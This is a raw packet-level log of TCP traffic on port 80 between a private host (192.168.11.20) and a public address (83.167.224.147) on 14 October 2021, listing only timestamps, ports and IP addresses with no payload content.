Oct 14, 2021 08:40:49.055943966 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.055982113 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.056034088 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.056046963 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.056168079 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.076710939 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.076886892 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.077023983 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.077079058 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.077126026 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.077167988 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.077188015 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.077214956 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.077250957 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.077263117 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.077310085 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.077337027 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.077372074 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.077384949 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.077431917 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.077477932 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.077517986 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.077542067 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.077590942 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.077595949 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.077651024 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.077655077 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.077665091 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.077722073 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.077749968 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.077785015 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.077830076 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.077883959 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.077941895 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.077955008 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.077990055 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.078042984 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.078088999 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.078135014 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.078181982 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.078186989 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.078239918 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.078273058 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.078304052 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.078351974 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.078356028 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.078409910 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.078417063 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.078470945 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.078516960 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.078543901 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.078555107 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.078592062 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.078640938 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.078645945 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.078699112 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.078744888 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.078789949 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.078835964 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.078881025 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.078927040 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.078974009 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.078979969 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.078989983 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.078998089 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.079025984 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.079066038 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.079075098 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.079083920 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.079138041 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.079173088 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.079196930 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.079221964 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.079231977 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.079267979 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.079319000 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.079324007 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.079333067 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.079390049 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.079425097 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.079448938 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.079494953 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.079507113 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.079516888 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.079571009 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.079616070 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.079632044 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.079678059 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.079704046 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.079740047 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.079751968 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.079798937 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.079844952 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.079857111 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.079865932 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.079917908 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.079953909 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.079978943 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.080003023 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.080041885 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.080064058 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.080102921 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.080111980 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.080163002 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.080212116 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.080215931 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.080255985 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.080286026 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.080316067 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.080348015 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.080363989 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.080410004 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.080432892 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.080471992 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.080481052 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.080532074 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.080559015 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.080593109 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.080638885 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.080667019 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.080699921 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.080739021 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.080759048 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.080786943 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.080821037 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.080869913 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.080874920 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.080883980 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.080940962 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.080987930 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.081008911 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.081020117 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.081060886 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.081110954 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.081115961 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.081125021 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.081182003 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.081228971 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.081260920 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.081290007 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.081337929 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.081341982 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.081381083 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.081409931 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.081432104 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.081471920 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.081480026 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.081531048 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.081578970 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.081612110 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.081641912 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.081675053 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.081713915 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.081783056 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.102421045 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.102642059 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.102972031 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.103033066 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.103084087 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.103193045 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.103240967 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.103266001 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.103287935 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.103313923 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.103359938 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.103405952 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.103409052 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.103446960 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.103450060 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.103466034 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.103560925 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.103598118 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.103620052 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.103667021 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.103713036 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.103775024 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.103785992 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.103821039 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.103837013 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.103916883 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.103945971 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.104007959 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.104022026 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.104055882 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.104101896 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.104147911 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.104156017 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.104193926 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.104216099 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.104235888 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.104239941 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.104286909 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.104332924 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.104334116 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.104381084 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.104382038 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.104428053 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.104432106 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.104474068 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.104485035 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.104521036 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.104548931 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.104567051 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.104597092 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.104613066 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.104659081 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.104674101 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.104705095 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.104722977 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.104751110 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.104772091 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.104795933 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.104820013 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.104842901 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.104888916 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.104890108 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.104933977 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.104939938 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.104979992 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.104998112 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.105015993 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.105026007 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.105072975 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.105094910 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.105114937 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.105118990 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.105165958 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.105194092 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.105211973 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.105211973 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.105257988 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.105303049 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.105304003 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.105348110 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.105353117 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.105395079 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.105401993 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.105441093 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.105449915 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.105485916 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.105499029 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.105531931 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.105546951 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.105578899 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.105597019 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.105626106 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.105671883 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.105673075 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.105716944 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.105736971 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.105757952 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.105762959 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.105808020 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.105835915 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.105854988 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.105890989 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.105935097 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.105942965 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.105957031 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.105989933 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.106033087 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.106034994 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.106081009 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.106122971 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.106127024 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.106173038 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.106177092 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.106218100 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.106226921 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.106265068 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.106275082 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.106311083 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.106324911 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.106355906 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.106401920 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.106403112 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.106447935 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.106451035 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.106494904 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.106497049 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.106540918 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.106545925 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.106586933 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.106595039 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.106632948 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.106643915 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.106679916 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.106693029 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.106726885 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.106741905 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.106772900 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.106800079 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.106811047 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.106821060 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.106868029 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.106889009 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.106914043 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.106937885 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.106960058 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.106987000 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.107006073 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.107036114 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.107045889 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.107052088 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.107098103 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.107141972 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.107146025 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.107187986 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.107234001 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.107254982 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.107265949 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.107279062 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.107325077 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.107351065 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.107371092 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.107400894 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.107415915 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.107450008 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.107461929 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.107506990 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.107554913 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.107604027 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.128216982 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.128278971 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.128388882 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.128408909 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.128469944 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.128519058 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.128565073 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.128609896 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.128654957 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.128657103 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.128762007 CEST	49810	80	192.168.11.20	83.167.224.147
